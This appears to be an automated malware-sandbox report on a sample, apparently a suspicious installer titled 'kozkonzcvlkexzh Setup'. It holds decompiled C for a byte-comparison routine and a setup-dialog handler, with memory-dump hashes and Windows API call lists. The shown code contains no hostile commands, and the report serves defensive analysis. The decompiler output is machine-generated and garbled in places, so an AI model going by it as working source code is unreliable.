                                                						if((__edi > 0) * 2 != 1) {
                                                							goto L1;
                                                						}
                                                						goto L6;
                                                					}
                                                					0 = 0 | __edi > 0x00000000;
                                                					__ecx = (__edi > 0) * 2 != 1;
                                                					if((__edi > 0) * 2 != 1) {
                                                						goto L1;
                                                					}
                                                					goto L4;
                                                				}
                                                				L1:
                                                				_t184 = _t231;
                                                				return _t184;
                                                			}


                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction ID: 2083d964b3183f57a0d3fd909884ee548d6d7061eb39dd1fe6437e0fcef10a12
                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction Fuzzy Hash: 45C163322055930AEB4DCA798C3413EBBE2DB966F1327176DD8B2DF1D8EF10D5249A60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E10005EA5(void* __edx, void* __esi) {
                                                				signed char _t177;
                                                				void* _t178;
                                                				signed char _t179;
                                                				signed char _t180;
                                                				signed char _t181;
                                                				signed char _t183;
                                                				signed char _t184;
                                                				void* _t228;
                                                				void* _t278;
                                                				void* _t281;
                                                				void* _t283;
                                                				void* _t285;
                                                				void* _t287;
                                                				void* _t289;
                                                				void* _t291;
                                                				void* _t293;
                                                				void* _t295;
                                                				void* _t297;
                                                				void* _t299;
                                                				void* _t301;
                                                				void* _t303;
                                                				void* _t305;
                                                				void* _t307;
                                                				void* _t309;
                                                				void* _t311;
                                                				void* _t313;
                                                				void* _t315;
                                                				void* _t317;
                                                				void* _t319;
                                                				void* _t321;
                                                				void* _t322;
                                                
                                                				_t322 = __esi;
                                                				_t278 = __edx;
                                                				_t177 =  *(__esi - 0x1c);
                                                				if(_t177 ==  *(__edx - 0x1c)) {
                                                					_t228 = 0;
                                                					L10:
                                                					if(_t228 != 0) {
                                                						L78:
                                                						_t178 = _t228;
                                                						return _t178;
                                                					}
                                                					_t179 =  *(_t322 - 0x18);
                                                					if(_t179 ==  *(_t278 - 0x18)) {
                                                						_t228 = 0;
                                                						L21:
                                                						if(_t228 != 0) {
                                                							goto L78;
                                                						}
                                                						_t180 =  *(_t322 - 0x14);
                                                						if(_t180 ==  *(_t278 - 0x14)) {
                                                							_t228 = 0;
                                                							L32:
                                                							if(_t228 != 0) {
                                                								goto L78;
                                                							}
                                                							_t181 =  *(_t322 - 0x10);
                                                							if(_t181 ==  *(_t278 - 0x10)) {
                                                								_t228 = 0;
                                                								L43:
                                                								if(_t228 != 0) {
                                                									goto L78;
                                                								}
                                                								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
                                                									_t228 = 0;
                                                									L54:
                                                									if(_t228 != 0) {
                                                										goto L78;
                                                									}
                                                									_t183 =  *(_t322 - 8);
                                                									if(_t183 ==  *(_t278 - 8)) {
                                                										_t228 = 0;
                                                										L65:
                                                										if(_t228 != 0) {
                                                											goto L78;
                                                										}
                                                										_t184 =  *(_t322 - 4);
                                                										if(_t184 ==  *(_t278 - 4)) {
                                                											_t228 = 0;
                                                											L76:
                                                											if(_t228 == 0) {
                                                												_t228 = 0;
                                                											}
                                                											goto L78;
                                                										}
                                                										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
                                                										if(_t281 == 0) {
                                                											L69:
                                                											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
                                                											if(_t283 == 0) {
                                                												L71:
                                                												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
                                                												if(_t285 == 0) {
                                                													L73:
                                                													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
                                                													if(_t228 != 0) {
                                                														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                													}
                                                													goto L76;
                                                												}
                                                												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
                                                												if(_t228 != 0) {
                                                													goto L78;
                                                												}
                                                												goto L73;
                                                											}
                                                											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
                                                											if(_t228 != 0) {
                                                												goto L78;
                                                											}
                                                											goto L71;
                                                										}
                                                										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
                                                										if(_t228 != 0) {
                                                											goto L78;
                                                										}
                                                										goto L69;
                                                									}
                                                									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
                                                									if(_t287 == 0) {
                                                										L58:
                                                										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
                                                										if(_t289 == 0) {
                                                											L60:
                                                											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
                                                											if(_t291 == 0) {
                                                												L62:
                                                												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
                                                												if(_t228 != 0) {
                                                													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                												}
                                                												goto L65;
                                                											}
                                                											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
                                                											if(_t228 != 0) {
                                                												goto L78;
                                                											}
                                                											goto L62;
                                                										}
                                                										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
                                                										if(_t228 != 0) {
                                                											goto L78;
                                                										}
                                                										goto L60;
                                                									}
                                                									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
                                                									if(_t228 != 0) {
                                                										goto L78;
                                                									}
                                                									goto L58;
                                                								}
                                                								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
                                                								if(_t293 == 0) {
                                                									L47:
                                                									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
                                                									if(_t295 == 0) {
                                                										L49:
                                                										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
                                                										if(_t297 == 0) {
                                                											L51:
                                                											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
                                                											if(_t228 != 0) {
                                                												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                											}
                                                											goto L54;
                                                										}
                                                										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
                                                										if(_t228 != 0) {
                                                											goto L78;
                                                										}
                                                										goto L51;
                                                									}
                                                									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
                                                									if(_t228 != 0) {
                                                										goto L78;
                                                									}
                                                									goto L49;
                                                								}
                                                								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
                                                								if(_t228 != 0) {
                                                									goto L78;
                                                								}
                                                								goto L47;
                                                							}
                                                							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
                                                							if(_t299 == 0) {
                                                								L36:
                                                								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
                                                								if(_t301 == 0) {
                                                									L38:
                                                									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
                                                									if(_t303 == 0) {
                                                										L40:
                                                										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
                                                										if(_t228 != 0) {
                                                											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                										}
                                                										goto L43;
                                                									}
                                                									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
                                                									if(_t228 != 0) {
                                                										goto L78;
                                                									}
                                                									goto L40;
                                                								}
                                                								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
                                                								if(_t228 != 0) {
                                                									goto L78;
                                                								}
                                                								goto L38;
                                                							}
                                                							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
                                                							if(_t228 != 0) {
                                                								goto L78;
                                                							}
                                                							goto L36;
                                                						}
                                                						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
                                                						if(_t305 == 0) {
                                                							L25:
                                                							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
                                                							if(_t307 == 0) {
                                                								L27:
                                                								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
                                                								if(_t309 == 0) {
                                                									L29:
                                                									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
                                                									if(_t228 != 0) {
                                                										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                									}
                                                									goto L32;
                                                								}
                                                								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
                                                								if(_t228 != 0) {
                                                									goto L78;
                                                								}
                                                								goto L29;
                                                							}
                                                							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
                                                							if(_t228 != 0) {
                                                								goto L78;
                                                							}
                                                							goto L27;
                                                						}
                                                						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
                                                						if(_t228 != 0) {
                                                							goto L78;
                                                						}
                                                						goto L25;
                                                					}
                                                					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
                                                					if(_t311 == 0) {
                                                						L14:
                                                						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
                                                						if(_t313 == 0) {
                                                							L16:
                                                							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
                                                							if(_t315 == 0) {
                                                								L18:
                                                								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
                                                								if(_t228 != 0) {
                                                									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                								}
                                                								goto L21;
                                                							}
                                                							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
                                                							if(_t228 != 0) {
                                                								goto L78;
                                                							}
                                                							goto L18;
                                                						}
                                                						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
                                                						if(_t228 != 0) {
                                                							goto L78;
                                                						}
                                                						goto L16;
                                                					}
                                                					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
                                                					if(_t228 != 0) {
                                                						goto L78;
                                                					}
                                                					goto L14;
                                                				}
                                                				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                				if(_t317 == 0) {
                                                					L3:
                                                					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
                                                					if(_t319 == 0) {
                                                						L5:
                                                						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
                                                						if(_t321 == 0) {
                                                							L7:
                                                							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
                                                							if(_t228 != 0) {
                                                								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                							}
                                                							goto L10;
                                                						}
                                                						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
                                                						if(_t228 != 0) {
                                                							goto L78;
                                                						}
                                                						goto L7;
                                                					}
                                                					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
                                                					if(_t228 != 0) {
                                                						goto L78;
                                                					}
                                                					goto L5;
                                                				}
                                                				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
                                                				if(_t228 != 0) {
                                                					goto L78;
                                                				}
                                                				goto L3;
                                                			}


































                                                0x10005ff1
                                                0x10005ffa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005ffa
                                                0x10005f4f
                                                0x10005f51
                                                0x10005f69
                                                0x10005f71
                                                0x10005f73
                                                0x10005f8b
                                                0x10005f93
                                                0x10005f95
                                                0x10005fad
                                                0x10005fb5
                                                0x10005fb7
                                                0x10005fc0
                                                0x10005fc0
                                                0x00000000
                                                0x10005fb7
                                                0x10005f9e
                                                0x10005fa7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005fa7
                                                0x10005f7c
                                                0x10005f85
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005f85
                                                0x10005f5a
                                                0x10005f63
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005f63
                                                0x10005eb8
                                                0x10005eba
                                                0x10005ed2
                                                0x10005eda
                                                0x10005edc
                                                0x10005ef4
                                                0x10005efc
                                                0x10005efe
                                                0x10005f16
                                                0x10005f1e
                                                0x10005f20
                                                0x10005f29
                                                0x10005f29
                                                0x00000000
                                                0x10005f20
                                                0x10005f07
                                                0x10005f10
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005f10
                                                0x10005ee5
                                                0x10005eee
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10005eee
                                                0x10005ec3
                                                0x10005ecc
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: f37e42eeb5402f7c6449bca691c0e58474bf824e6ab10249124d34993b56c141
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: 3EC1703220559309EB4DCA79883413FBBE2EB966F132B176DD4B2CF5C9EF24D5249620
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                • Instruction ID: a5f5cc404345051d9a3d43732892c5c43a2385a91314192d1658d7f645f45817
                                                • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                • Instruction Fuzzy Hash: 0111C272A10209AFCB10DBAAD8888AEF7FDEF466D4B5540A5F804DB214E774DEC0C660
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                • Instruction ID: f4d788da18cf8e267c38a3c1811d86f470bc5a631a0a0da5908c50b93dabbf40
                                                • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                • Instruction Fuzzy Hash: FAE092357645049FCB44CBA8CC41D55B3F4EB09230B114290FC15CB3E0EA34FE80D650
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                • Instruction ID: 2df1a6d1e3cca68c9d16f3148c796fc1ccc26e8a365bcac769081ee74b5b76f8
                                                • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                • Instruction Fuzzy Hash: 47E08C3A7146508BC360DB59C980942F3F9FB8A2F072A486AEC89DB751C230FD808A90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                				struct HWND__* _v32;
                                                				void* _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t35;
                                                				signed int _t37;
                                                				signed int _t39;
                                                				intOrPtr _t44;
                                                				struct HWND__* _t49;
                                                				signed int _t67;
                                                				struct HWND__* _t73;
                                                				signed int _t86;
                                                				struct HWND__* _t91;
                                                				signed int _t99;
                                                				int _t103;
                                                				signed int _t115;
                                                				signed int _t116;
                                                				int _t117;
                                                				signed int _t122;
                                                				struct HWND__* _t125;
                                                				struct HWND__* _t126;
                                                				int _t127;
                                                				long _t130;
                                                				int _t132;
                                                				int _t133;
                                                				void* _t134;
                                                				void* _t142;
                                                
                                                				_t115 = _a8;
                                                				if(_t115 == 0x110 || _t115 == 0x408) {
                                                					_t35 = _a12;
                                                					_t125 = _a4;
                                                					__eflags = _t115 - 0x110;
                                                					 *0x42051c = _t35;
                                                					if(_t115 == 0x110) {
                                                						 *0x423f48 = _t125;
                                                						 *0x420530 = GetDlgItem(_t125, 1);
                                                						_t91 = GetDlgItem(_t125, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x41f4f8 = _t91;
                                                						E00403E54(_t125);
                                                						SetClassLongA(_t125, 0xfffffff2,  *0x423728);
                                                						 *0x42370c = E0040140B(4);
                                                						_t35 = 1;
                                                						__eflags = 1;
                                                						 *0x42051c = 1;
                                                					}
                                                					_t122 =  *0x4091ac; // 0xffffffff
                                                					_t133 = 0;
                                                					_t130 = (_t122 << 6) +  *0x423f60;
                                                					__eflags = _t122;
                                                					if(_t122 < 0) {
                                                						L34:
                                                						E00403EA0(0x40b);
                                                						while(1) {
                                                							_t37 =  *0x42051c;
                                                							 *0x4091ac =  *0x4091ac + _t37;
                                                							_t130 = _t130 + (_t37 << 6);
                                                							_t39 =  *0x4091ac; // 0xffffffff
                                                							__eflags = _t39 -  *0x423f64; // 0x2
                                                							if(__eflags == 0) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x42370c - _t133; // 0x0
                                                							if(__eflags != 0) {
                                                								break;
                                                							}
                                                							_t44 =  *0x423f64; // 0x2
                                                							__eflags =  *0x4091ac - _t44; // 0xffffffff
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t116 =  *(_t130 + 0x14);
                                                							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
                                                							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E00403E54(_t125);
                                                							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E00403E54(_t125);
                                                							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E00403E54(_t125);
                                                							_t49 = GetDlgItem(_t125, 3);
                                                							__eflags =  *0x423fcc - _t133; // 0x0
                                                							_v32 = _t49;
                                                							if(__eflags != 0) {
                                                								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t116;
                                                							}
                                                							ShowWindow(_t49, _t116 & 0x00000008);
                                                							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                							E00403E76(_t116 & 0x00000002);
                                                							_t117 = _t116 & 0x00000004;
                                                							EnableWindow( *0x41f4f8, _t117);
                                                							__eflags = _t117 - _t133;
                                                							if(_t117 == _t133) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t133);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                							__eflags =  *0x423fcc - _t133; // 0x0
                                                							if(__eflags == 0) {
                                                								_push( *0x420530);
                                                							} else {
                                                								SendMessageA(_t125, 0x401, 2, _t133);
                                                								_push( *0x41f4f8);
                                                							}
                                                							E00403E89();
                                                							E00405B98(0x420538, "kozkonzcvlkexzh Setup");
                                                							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                							SetWindowTextA(_t125, 0x420538);
                                                							_push(_t133);
                                                							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                							__eflags = _t67;
                                                							if(_t67 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t130 - _t133;
                                                								if( *_t130 == _t133) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t130 + 4) - 5;
                                                								if( *(_t130 + 4) != 5) {
                                                									DestroyWindow( *0x423718);
                                                									 *0x41fd08 = _t130;
                                                									__eflags =  *_t130 - _t133;
                                                									if( *_t130 <= _t133) {
                                                										goto L58;
                                                									}
                                                									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
                                                									__eflags = _t73 - _t133;
                                                									 *0x423718 = _t73;
                                                									if(_t73 == _t133) {
                                                										goto L58;
                                                									}
                                                									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                									_push(6);
                                                									E00403E54(_t73);
                                                									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                									ScreenToClient(_t125, _t134 + 0x10);
                                                									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                									_push(_t133);
                                                									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                									__eflags =  *0x42370c - _t133; // 0x0
                                                									if(__eflags != 0) {
                                                										goto L61;
                                                									}
                                                									ShowWindow( *0x423718, 8);
                                                									E00403EA0(0x405);
                                                									goto L58;
                                                								}
                                                								__eflags =  *0x423fcc - _t133; // 0x0
                                                								if(__eflags != 0) {
                                                									goto L61;
                                                								}
                                                								__eflags =  *0x423fc0 - _t133; // 0x0
                                                								if(__eflags != 0) {
                                                									continue;
                                                								}
                                                								goto L61;
                                                							}
                                                						}
                                                						DestroyWindow( *0x423718);
                                                						 *0x423f48 = _t133;
                                                						EndDialog(_t125,  *0x41f900);
                                                						goto L58;
                                                					} else {
                                                						__eflags = _t35 - 1;
                                                						if(_t35 != 1) {
                                                							L33:
                                                							__eflags =  *_t130 - _t133;
                                                							if( *_t130 == _t133) {
                                                								goto L61;
                                                							}
                                                							goto L34;
                                                						}
                                                						_push(0);
                                                						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                						__eflags = _t86;
                                                						if(_t86 == 0) {
                                                							goto L33;
                                                						}
                                                						SendMessageA( *0x423718, 0x40f, 0, 1);
                                                						__eflags =  *0x42370c - _t133; // 0x0
                                                						return 0 | __eflags == 0x00000000;
                                                					}
                                                				} else {
                                                					_t125 = _a4;
                                                					_t133 = 0;
                                                					if(_t115 == 0x47) {
                                                						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
                                                					}
                                                					if(_t115 == 5) {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
                                                					}
                                                					if(_t115 != 0x40d) {
                                                						__eflags = _t115 - 0x11;
                                                						if(_t115 != 0x11) {
                                                							__eflags = _t115 - 0x111;
                                                							if(_t115 != 0x111) {
                                                								L26:
                                                								return E00403EBB(_t115, _a12, _a16);
                                                							}
                                                							_t132 = _a12 & 0x0000ffff;
                                                							_t126 = GetDlgItem(_t125, _t132);
                                                							__eflags = _t126 - _t133;
                                                							if(_t126 == _t133) {
                                                								L13:
                                                								__eflags = _t132 - 1;
                                                								if(_t132 != 1) {
                                                									__eflags = _t132 - 3;
                                                									if(_t132 != 3) {
                                                										_t127 = 2;
                                                										__eflags = _t132 - _t127;
                                                										if(_t132 != _t127) {
                                                											L25:
                                                											SendMessageA( *0x423718, 0x111, _a12, _a16);
                                                											goto L26;
                                                										}
                                                										__eflags =  *0x423fcc - _t133; // 0x0
                                                										if(__eflags == 0) {
                                                											_t99 = E0040140B(3);
                                                											__eflags = _t99;
                                                											if(_t99 != 0) {
                                                												goto L26;
                                                											}
                                                											 *0x41f900 = 1;
                                                											L21:
                                                											_push(0x78);
                                                											L22:
                                                											E00403E2D();
                                                											goto L26;
                                                										}
                                                										E0040140B(_t127);
                                                										 *0x41f900 = _t127;
                                                										goto L21;
                                                									}
                                                									__eflags =  *0x4091ac - _t133; // 0xffffffff
                                                									if(__eflags <= 0) {
                                                										goto L25;
                                                									}
                                                									_push(0xffffffff);
                                                									goto L22;
                                                								}
                                                								_push(_t132);
                                                								goto L22;
                                                							}
                                                							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                							_t103 = IsWindowEnabled(_t126);
                                                							__eflags = _t103;
                                                							if(_t103 == 0) {
                                                								goto L61;
                                                							}
                                                							goto L13;
                                                						}
                                                						SetWindowLongA(_t125, _t133, _t133);
                                                						return 1;
                                                					} else {
                                                						DestroyWindow( *0x423718);
                                                						 *0x423718 = _a12;
                                                						L58:
                                                						if( *0x421538 == _t133) {
                                                							_t142 =  *0x423718 - _t133; // 0x0
                                                							if(_t142 != 0) {
                                                								ShowWindow(_t125, 0xa);
                                                								 *0x421538 = 1;
                                                							}
                                                						}
                                                						L61:
                                                						return 0;
                                                					}
                                                				}
                                                			}

































                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                                • ShowWindow.USER32(?), ref: 004039DA
                                                • DestroyWindow.USER32 ref: 004039EE
                                                • SetWindowLongA.USER32 ref: 00403A0A
                                                • GetDlgItem.USER32(?,?), ref: 00403A2B
                                                • SendMessageA.USER32 ref: 00403A3F
                                                • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                                • GetDlgItem.USER32(?,00000001), ref: 00403AF4
                                                • GetDlgItem.USER32(?,00000002), ref: 00403AFE
                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403B18
                                                • SendMessageA.USER32 ref: 00403B69
                                                • GetDlgItem.USER32(?,00000003), ref: 00403C0F
                                                • ShowWindow.USER32(00000000,?), ref: 00403C30
                                                • EnableWindow.USER32(?,?), ref: 00403C42
                                                • EnableWindow.USER32(?,?), ref: 00403C5D
                                                • GetSystemMenu.USER32 ref: 00403C73
                                                • EnableMenuItem.USER32 ref: 00403C7A
                                                • SendMessageA.USER32 ref: 00403C92
                                                • SendMessageA.USER32 ref: 00403CA5
                                                • lstrlenA.KERNEL32(00420538,?,00420538,kozkonzcvlkexzh Setup), ref: 00403CCE
                                                • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                                • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
